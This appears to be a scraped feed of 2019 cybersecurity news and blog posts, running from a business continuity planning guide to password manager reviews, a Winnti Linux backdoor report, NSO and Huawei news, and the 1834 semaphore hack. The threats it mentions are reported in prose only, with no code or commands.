Whether taking a disaster recovery or business continuity approach, your objective should be to create a plan that buys you enough time to recover within an acceptable timeframe as defined by your RTO (recovery time objective). Just remember that business continuity has to consider two timeframes: when to be up and running again, and when to be back to full functionality.

Common threats to business continuity

Most disruptions that you will experience fall into one of these categories:

  • Natural disasters

Earthquakes, hurricanes and wildfires might spring to mind when you think of natural disasters, and although they often disrupt business, you only need to worry about them if you live in a part of the world where they are known to occur.

However, natural disasters also include snowstorms, heavy wind and floods, which are less dependent on geography but can still disrupt business, and which you should therefore plan for.

  • Man-made disasters

Your main concern in this category should be events that damage or disrupt transport routes, like car accidents and train crashes. If a major road or rail network is shut down, you might be unable to receive deliveries, and employees and customers might not be able to reach you.

Other man-made disasters include oil spills, terrorist acts, industrial accidents and acts of war.

  • Utility failures

Electrical fires and burst pipes can cause huge problems for organisations and are liable to occur at any time.

A fire or flood could damage expensive equipment or require a room to be vacated. If a sewage line is broken, the sanitary risk (not to mention the smell) could force the organisation to send its employees home.

  • Technological failures

Sometimes technology can simply stop working. Systems crash, files are lost and documents go missing. The whys of technological failures are so manifold and unpredictable that it’s impossible to anticipate how or when they will occur – just consider them an ever-present risk that will materialise at some point, so be ready for when they occur.

  • Human error

An organisation’s staff is often its biggest security weakness. Employees will lose or accidentally expose data from time to time, and although staff awareness training will reduce the risk, it won’t eradicate the threat. Humans inevitably make mistakes, and you need to be aware of that when planning for disruptions.

  • Sabotage

Employees might also breach data deliberately. This typically happens if they are disgruntled at work (maybe they were turned down for a promotion) or have left the organisation acrimoniously and their login credentials are still active.

There’s also the possibility that staff will simply be lured by the financial gain from stealing sensitive information and selling it on the dark web.

  • Cyber attacks

The most frequent examples of cyber attacks include phishing emails (which are designed to steal information), brute-force attacks (in which crooks use automated software to crack an employee’s password) and ransomware (which locks down an organisation’s system until a fee is paid).

These are far from the only threats you need to plan for, though. Organisations’ networks and the applications used will contain dozens of vulnerabilities that crooks are always looking to exploit.

Why business continuity planning is so important

The most obvious reason to implement a BCP is to ensure that your organisation remains productive in the event of a disruption. Customers must still be able to use your services, employees must be able to continue doing their job and you can’t allow yourself to face a huge backlog of work as the delay continues.

But business continuity isn’t only about short-term goals. The cyber security landscape has become increasingly volatile in recent years, with cyber crime continuing to spiral and organisations’ reliance on technology leading to vast numbers of accidental and deliberate data breaches. As a result, organisations need to prove to customers and stakeholders that they are prepared for anything.

Business continuity is especially important for OES (operators of essential services) and DSPs (digital service providers), as a disruption could cause major problems for a large section of the population. To ensure that such organisations are sufficiently prepared for risks, the EU adopted the NIS Directive, which was transposed into UK law as the NIS (Network and Information Systems) Regulations 2018.

DSPs within the Regulations’ scope are explicitly required to put business continuity measures in place. Although the same isn’t true of OES, they should still consider implementing a BCP as a means of providing a more reliable service.

Benefits of business continuity planning

Beyond the obvious reasons to implement a BCP (to remain functional in the event of a disruption), you should also consider its ability to:

  • Protect your organisation’s reputation: In demonstrating a fast and efficient response to disruption, the public will almost certainly be impressed by the way you operate. This will mitigate any negative sentiments that will accompany the loss of productivity, and it might even improve your reputation.
  • Boost employees’ morale: No one wants to work in a chaotic environment, so your staff will be pleased to know that management has a plan in case things go wrong. If the plan is well written (which we’ll show you how to do shortly), everyone in the organisation will be accounted for, which will prove to employees that management has considered their needs.
  • Build your relationship with third parties and subsidiaries: An effective BCP demonstrates that the organisation is being run well from top to bottom, which will encourage anyone that you work with. It shows that you are a reliable partner that has taken into account its responsibilities to customers, employees and partners.

Writing your business continuity plan: 8 simple steps

  1. Purpose and scope of the BCP

Your first task is to define the purpose and scope of the plan. This is especially relevant if your organisation comprises several subsidiaries or is based in different locations, as each one will have its own requirements.

If this is the case, it’s up to you to decide whether to create one plan that covers each subsidiary/location separately or to focus on just one part of your business.

  1. Responsibilities

The next step is to decide which employee(s) will be responsible for enacting the plan. You might opt to put one person in charge of the plan or delegate responsibility to people across your organisation.

Small organisations might be able to get away with a single leader, as there’s a good chance that a senior member of staff will have oversight of every department and its needs. However, if that’s not the case, a group of employees will need to share responsibility.

You also need to identify who has the authority to grant financial costs outside of the normal department budget. This could be the same person (or people) responsible for enacting the plan, or it could be a specific duty assigned to someone else.

  1. Invoking the BCP

This step defines when and how the plan will take effect. After all, it’s not always clear that a serious (and possibly planned-for) disruption has occurred; it’ll often begin with, say, the office lights going out and employees looking across the room at each other asking: ‘What’s going on?’

It’s only when someone takes charge that you can determine what caused the problem and how to respond. You don’t need to get into specifics here (that’s covered in step five), but you do need to document who will get the process started, how response teams will be mobilised and where those responsible for enacting the plan should meet.

  1. Specific BCP content

This is the meat of your plan, containing the actions you will take to recover from various incidents. It will be the result of two other processes – the risk assessment and BIA (business impact assessment) – in which you identify the threats you face and the way your organisation will be affected by them.

Once you’ve collected this information, you should take each business disruption and outline:

  • Steps that must be taken to protect individuals (staff, customers and third parties) during the business disruption;
  • Actions that should be taken to contain the disruption and prevent further loss, disturbance or unavailability of prioritised activities;
  • Guidelines on record-keeping requirements during and after the incident (such as what needs to be recorded and where);
  • Prioritised recovery objectives and the actions and resources that are needed to achieve them; and
  • Internal and external (inter)dependencies and interactions, and how these might impact one another during a disruptive incident.
  1. Communications

This stage focuses on internal and external communications. Internal communication refers to the way you will keep employees informed about the state of the business, something that’s particularly important if your usual modes of communication are disabled due to the disruption.

In the event of serious disruptions, you should also consider contacting employees’ next of kin to update them of their wellbeing. This is both thoughtful and prevents your organisation’s phone lines being jammed by concerned family members.

External communication refers to the way you will deal with the media regarding the incident. If the disruption is severe enough, you should release a statement explaining the nature of the incident, what has been affected and how you are responding. In extreme cases, you might also be obliged to give interviews, in which case you should decide who will represent your organisation and what your strategy will be.

  1. Stakeholders

You will be required to contact stakeholders as soon as possible following a disruption, so your BCP should contain their contact details for easy reference.

  1. Appoint a business continuity manager

The business continuity manager is responsible for documenting the plan and keeping it safe. They are also responsible for reviewing the plan to make sure the information is accurate. For example, if someone with BCP responsibilities leaves the organisation, the business continuity manager should flag this, so the team can appoint a successor.

  1. Change management

Once the plan is finalised, it should be published in hard copy and as a digital file, and be made accessible to all members of staff.

Every time changes are made to the BCP, you must ensure that the digital and hard-copy forms are updated.

Don’t forget to test your plan

The only way to be sure that your plan works is by testing (or ‘validating’) it. How often you test the plan is up to you, but we recommend doing it at least twice a year or whenever there are substantial changes to your organisation.

There are three types of test that you can conduct:

a. Table-top exercise

A table-top exercise is essentially a read-through of the plan. Senior employees and those with BCP responsibilities should go through the plan together, looking for gaps and ensuring that all business units are represented.

b. Structured walkthrough

A structured walkthrough is like a rehearsal, with each team member role-playing their responsibilities according to specified disruptions. The objective is to familiarise employees with their responsibilities and to make sure the plan works as intended.

You might choose to simulate the process across the entire organisation, but it can obviously be difficult to make everyone available at the same time, particularly given that the walkthrough will probably have to occur outside of office hours. As such, you might choose to split the walkthrough across the week, with one or two departments playing out a disaster at a time.

c. Disaster simulation testing

A disaster simulation test is essentially a dress rehearsal. You create a test environment that simulates an actual disaster across the entire organisation and then put the plan into action.

Unlike other types of test, you aren’t looking for gaps as you go. Instead, you should see the plan through to its conclusion, so you know exactly what the consequences of your actions (or lack thereof) are. Only after you’ve seen the plan through to the end should you review your actions and look for ways to improve.

Business continuity planning made simple

Anyone looking for help on how to develop and document their BCP should take a look at our free BCP template.

It expands on the eight steps we’ve listed in this article, showing you exactly how to structure your plan.

BCP template

Download our template >>

The post How to write a business continuity plan: the easy way appeared first on IT Governance Blog.

Six Best Password Managers for Online Protection in 2019

We at HackerCombat have always been emphasizing on the importance of passwords and password management in cybersecurity. At a time when even individual users have and manage many login ids and passwords, it’s undoubtedly a herculean task for organizations to manage the large number of passwords they have at their disposal. (Remember, it’s never ever advisable to have same passwords for different accounts/services, from the security point of view!) The best thing that organizations can do, as regards handling passwords, is to use a decent password manager.

We seek to put together a list of the six best password managers that can be used for online protection in 2019. Here we go-

Keeper, from Keeper Security Inc.

The password manager offered by Keeper Security Inc., which suits Windows, Linux and Mac is ideal for business enterprises and other organizations and can also be used by individuals or family groups. Keeper password manager used two-factor authentication plus secure file storage, which ensures comprehensive protection of your information. The other notable features include version history (ability to restore previous versions of users’ records), emergency access for five different contacts to access a subscriber’s passwords, custom fields to keep personal records (driving license numbers, passport data etc) in the app etc. Utmost flexibility is offered as regards data storage.

LastPass Password Manager

The LastPass password manager, which is for Windows, Linux, Mac and Chrome, offers some remarkable features including two-factor authentication, free credit monitoring, an auto-fill feature to streamline users’ shopping, multiple identities etc. Once the user sets up a master password, LastPass enables importing of all saved login credentials from Chrome, Firefox, Edge, Opera, and Safari. Once this is done, the user needs to remember only the master password and all the rest is taken care of. A notable advantage of using LastPass password manager is that it stores encrypted information on its cloud servers and hence users can access the passwords from computers other than their personal PCs as well. They can even share the data with others in their family group or organization, enabling them to access the credentials from the cloud. There’s also a password generator that helps create unique passwords. The premium version comes with additional authentication options, data syncing with mobile devices, excellent tech support etc. Use LastPass for its excellent interface and notable features.

Sticky Password, from the AVG Antivirus team

Sticky Password is a password manager that’s ideal for Windows, iOS, Android and Apple, and is created by the team behind the AVG antivirus. It supports lots of browsers, especially on the desktop and offers secure cloud-encrypted syncing options between devices and also offers, in addition to the conventional sign-in options, Face ID as well as fingerprint sign-ins. It’s easy and simple and has a free version plus a premium version with extra cloud features. It comes with AES-256 encryption and strong password generation capabilities.


1Password, which is a good password manager for Windows, macOS, Android, iOS and Chrome OS, has notable features like reliable username-password storage with secure sharing, strong password generator, digital wallet (for saving logins, card data, network passwords etc), intuitive and easy user interface etc. 1Password, which is developed by AgileBits Inc., has as its highlight a built-in “watchtower” service that notifies users of ongoing website breaches. The password manager allows, in addition to local syncing of data, the syncing of information between computers via iCloud, Dropbox etc. There is no free-version for 1Password, which can also be used as browser extensions, integrated with desktop web browsers like Chrome, Safari, Firefox, Edge, and Opera.

LogMeOnce Password Manager

One of the best password managers for Mac OS X, LogMeOnce also syncs passwords across Windows, iOS and Android. The notable features offered include two-factor authentication, securing passwords with military-grade AES-256 encryption and the very remarkable Mugshot feature, which takes a photograph of an intruder when there is a hack and also tracks locations in case the device is stolen.

Dashlane Password Manager

Dashlane password manager, which is ideal for Windows, iOS, Mac and Android, has some notable features. It is secured with two-factor authentication and offers users the ability to change multiple passwords for multiple websites with just a few clicks. The user can encrypt (with AES-256 encryption) and store passwords either locally or automatically sync them across different devices. Dashlane’s automatic password changer helps change accounts’ passwords without the user having to deal with it personally. Though there is a free version for individual users, businesses need to go for a paid one, which comes with an annual fee.

Related Resources:

10 Practical Computer Protection Tips

7 Data Protection Tips for Small Businesses

The post Six Best Password Managers for Online Protection in 2019 appeared first on .

Sajid Javid announces overhaul of espionage and treason laws

New bill needed to tackle hostile activity by Russia and others, says home secretary

Hostile state actors – spies, assassins or hackers directed by the government of another country – are to be targeted by refreshed espionage and treason laws, the home secretary has announced.

In a speech to security officials in central London, Sajid Javid revealed plans to publish a new espionage bill to tackle increased hostile state activity from countries including but not limited to Russia.

Continue reading...

Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

Security experts from Chronicle, the Alphabet’s cyber-security division, have discovered a Linux variant of the Winnti backdoor. It is the first time that researchers found a Linux version of the backdoor user by China-linked APT groups tacked as Winnti.

chinese hackers

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Chronicle researchers while investigating the cyber attack that hit the Bayer pharmaceutical company in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti, dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company.” reads the analysis published by
Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti⁶ samples designed specifically for Linux.” 

The technical analysis of the Linux version of Winnti backdoor revealed the presence of two files, the main backdoor (libxselinux) and a library ( used to avoid the detection.

The Winnti backdoor has a modular structure, it implements distinct functionalities using plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe attackers used additional modules for Linux to implement plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux version of the Winnti variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report.” continues the report. “Embedded in this sample’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators. Winnti ver. 1, these values were designated as ‘tag’ and ‘group’. “

Like Windows variants of the Winnti backdoor, the Linux version also handles outbound communications using multiple protocols including ICMP, HTTP, as well as custom TCP and UDP protocols.

The Linux version also implements another feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winniti hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

Technical information about the above feature was also shared by the Thyssenkrupp CERT, its experts released a Nmap script that could be used to identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditionalcomfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant.” concludes the report that includes IoCs and Yara rules for the identification of the threat.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)

The post Chronicle experts spotted a Linux variant of the Winnti backdoor appeared first on Security Affairs.

Company Behind LeakedSource Pleads Guilty after RCMP Investigation

A company responsible for helping to operate has submitted a guilty plea following an investigation by the Royal Canadian Mounted Police (RCMP). On 17 May, Defiant Tech Inc. pleaded guilty to the charge of “trafficking in identity information and possession of property obtained by crime” in association with an investigation surrounding LeakedSource. RCMP initiated […]… Read More

The post Company Behind LeakedSource Pleads Guilty after RCMP Investigation appeared first on The State of Security.

LeakedSource Company Pleads Guilty

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottowa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Ex-CIA Man Gets 20 Years for Handing China Secrets

Ex-CIA Man Gets 20 Years for Handing China Secrets

A former CIA intelligence officer has been sentenced to two decades behind bars after being found guilty last year of passing defense secrets to China.

Kevin Patrick Mallory, 62, of Leesburg, was found guilty by a federal jury in June 2018 of conspiracy to deliver, attempted delivery, delivery of national defense information to aid a foreign government, and making material false statements.

He is said to have been paid $25,000 for handing classified documents to 'Michael Yang,' a Chinese intelligence officer he met in Shanghai in March and April 2017.

These documents included information on CIA informants, according to the Department of Justice.

Fluent Mandarin-speaker Mallory is said to have scanned the Top Secret documents onto an SD card at his local FedEx store. Yet although he shredded the originals, the FBI found the storage device carefully hidden, during a search of his home.

The disgraced former spy worked for various government agencies and defense contractors, including roles as a covert case officer for the CIA and an intelligence officer for the Defense Intelligence Agency (DIA). His Top Secret clearance is said to have been terminated in 2012 when he left government service.

“Former US intelligence officer Kevin Patrick Mallory will spend the next 20 years of his life in prison for conspiring to pass national defense information to a Chinese intelligence officer,” said assistant attorney general for national security, John Demers.

“This case is one in an alarming trend of former US intelligence officers being targeted by China and betraying their country and colleagues. This sentence, together with the recent guilty pleas of Ron Hansen in Utah and Jerry Lee in Virginia, deliver the stern message that our former intelligence officers have no business partnering with the Chinese, or any other adversarial foreign intelligence service.”

Lee is thought to have provided the information needed to take down a major CIA network in China between 2010 and 2012. The US is believed to be at a distinct intelligence disadvantage now with regards to China.

Google will block Huawei from using Android and its services

The Reuters agency revealed in exclusive that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

The news a bomb, Google has suspended some business with Huawei after Trump’s ban on the Chinese telco giant.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Huawei Dutch intelligence

The decision is a blow to the Huawei and has a significant impact on its strategy.

Just on Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday, the U.S. Commerce Department said it was considering to debunk the decision on the company to “prevent the interruption of existing network operations and equipment”.

“Alphabet Inc’s Google has suspended business with Huawei that requires the transfer of hardware, software and technical services except those publicly available via open source licensing.” reported the Reuters.

Google explained that there will be no impact on current owners of Huawei devices running Google software because they will continue to receive updates provided by the US firm.

“We are complying with the order and reviewing the implications,” said a Google spokesperson.

“For users of our services, Google Play and the security protections from Google Play Protect will continue to function on existing Huawei devices,”

Of course, the decision will disrupt the commercial activity of Chinese telco firm outside China. Everyone will buy a Huawei device will have no access to updates to Google Android and will have no access to Google services, including the Google Play Store and Gmail and YouTube apps.

Google confirmed that Huawei will only be able to use the public version of Android (Android Open Source Project (AOSP)), but the users of the Chinese giant will not be able to get access to proprietary apps and services from Google.

The Google decision could make it impossible for the Chinese company to sell its devices abroad and other companies could interrupt any trade with the company fearing repercussions.

Intel Corp, Qualcomm Inc, Xilinx Inc, and Broadcom Inc have already announced that they will not supply critical software and components to Huawei until further notice.

Is the Chinese giant ready to face this earthquake?

According to the company, it is already working to develop its own technology fearing a total block from US companies.

“Huawei has said it has spent the last few years preparing a contingency plan by developing its own technology in case it is blocked from using Android. Some of this technology is already being used in products sold in China, the company has said.” reported the Reuters.

“No matter what happens, the Android Community does not have any legal right to block any company from accessing its open-source license,”
March, Eric Xu, rotating chairman of Huawei, told to Reuters.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Android, Google)

The post Google will block Huawei from using Android and its services appeared first on Security Affairs.

Chipmakers Cut Huawei Shipments

Chipmakers Cut Huawei Shipments

European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones) Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

3 Ways to Improve Your Online Store’s Cyber Security

If you don’t do your utmost best to ensure that your online store is safe to use, you could end up putting your customers in real danger. From their finances being stolen to their personal data being hacked into, any kind of trouble could befall your site’s users if you do not take cyber security seriously. Make sure, then, that you take it seriously!

When it comes to improving your online store’s cybersecurity measures, the following advice makes for essential reading.

Make your mobile payments safer

One of the most burgeoning e-commerce trends is mobile payment. As stated on Oberlo’s mobile shopping trends article, this is because this kind of transaction process prioritizes comfort, and it makes the buying process a whole lot simpler. You would be foolish not to grant your customers the opportunity to pay for things on your store via their mobile devices.

Allowing this kind of payment to take place does come with its fair share of drawbacks; however, the biggest one being that it isn’t always the safest form of transaction. This doesn’t mean that you can’t strengthen your mobile payment process, though. Some of the measures that you can and should put into place in this instance include:

  • Only ever using a trusted payment platform
  • Ensuring that your payment terminals are NFC-enabled
  • Encrypting your network to ensure sensitive information cannot be sent through it

Switch to HTTPS

In this day and age, if you continue to stick with the HTTP protocol, your online store will be a sitting duck for cyber criminality. If you’re serious about safety, you must switch to HTTPS.

Created initially to safeguard the particularly sensitive elements of e-commerce sites, such as the payment process, HTTPS is now used to protect whole websites. By embracing this protocol, you will be able to be sure that your visitors’ data will remain safe at all conceivable points.

Protect your Admin Panel

Your Admin Panel is the aspect of your store that is least difficult for cybercriminals to crack. All it takes is for you to set a weak password, and hackers can have a field day when it comes to accessing all of the data you store in the backend of your site.

To protect your Admin Panel, you need to:

If they were to encounter trouble with a cybercriminal while using your online store, you can be sure that your customers will not give you a second chance. They will lose trust in you instantly, and more than likely never return to you again — and they’ll tell everybody that they know to avoid your website in the future, too, for good measure. If you don’t take cybersecurity seriously, you could also even find yourself in hot water with the authorities. The impact cyber criminality could have on your online store is something you should want to avoid at all costs, which is why you must put all of the above advice into practice as soon as possible.

The post 3 Ways to Improve Your Online Store’s Cyber Security appeared first on CyberDB.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, but the non-governmental organization fears its staff may be under surveillance spyware delivered leveraging the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trading of surveillance software is going out-of-control.

On August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabi’s agents, and the country has licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, it prepared a report composed of 26 pages to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that early 2019, a majority stake in NSO was acquired by the London based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can be still downloaded, but is not supported any longer. This newest version (v.2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Keeping Passwords Simple

We know at times this whole password thing sounds really complicated. Wouldn't be great if there was a brain dead way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips to keeping passwords super simple while keeping your accounts super secure.

Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service (SaaS) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks, for the first time eclipsing the payment-services category which suffered 27 percent of attacks recorded in the quarter. Online SaaS applications have become fundamental business tools, since they are convenient to use and cost-effective. SaaS services … More

The post Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks appeared first on Help Net Security.

Do You Know When The First Cyber Attack Took Place? Read On

WannaCry, a malicious computer virus that encrypts data and demands ransom, hit thousands of computers across the world, causing several organization to close down. Not a day goes by without a large company admits that its data has been breached. Cyber attacks are more known to be a thing of modern life, but their story goes farther than expected.

Do you know when the first cyber attack occurred? Many attribute this to Robert Morris, a 20-year-old Cornell undergraduate student, in 1988. He was also the first person to be charged under the Fraud and Cyber Abuse Act. Nevertheless, this was not the first cyber attack. The first cyber attack happened when optical telegraphy known as semaphore was used, long before our Internet and computers came into existence. This happened in the year 1834.

The semaphore system included a chain of towers with each tower having a mobile wooden arm in its upper part. Different configurations of these arms have been used to denote different symbols, letters, and numbers. The operators of each tower would use a telescope to verify the configuration of the adjacent tower and then reproduce them in their own tower. This made it possible to deliver messages much faster. The semaphore network was reserved exclusively for government use; however, in 1834, two brothers, François and Joseph Blanc came up with means of hacking into the system for their personal benefit.

François and Joseph Blanc were dealing with government bonds on the Bordeaux stock exchange that kept a close watch on the Paris stock exchange. The Paris stock exchange was the primary market, and the secondary markets always lagged due to the time it took for the information to travel through the post. So if traders could get to know the information in advance, they could make a lot of money by anticipating the market move.

The Blanc brothers’ bribed a telegraph operator who provided information on the stock market, and he had an accomplice in Paris who will help him get the details. The operator would then send the news of Tours to Bordeaux using the semaphore system. However, he breached the message by adding errors such as; codes to government messages that were later deciphered by another operator who was Blanc’s person stationed close to the Bordeaux line.

This lasted for approximately two years until one day the Tours operator became ill. So he shared this misdoing with one of his friends with a hope that he will continue the practice. The friend took a back seat and reported the operator to the authorities. The Blanc brothers were arrested for their cyber attack but were released due to the lack of an adequate law.

“The Blanc brothers’ story is also a reminder that with any new invention, people will always find a way to use it maliciously.” This is a timeless aspect of human nature, and it’s not something technology can or should be designed to solve, “said Tom Standage of The Economist writes. This is still so relevant.

Related Resources:

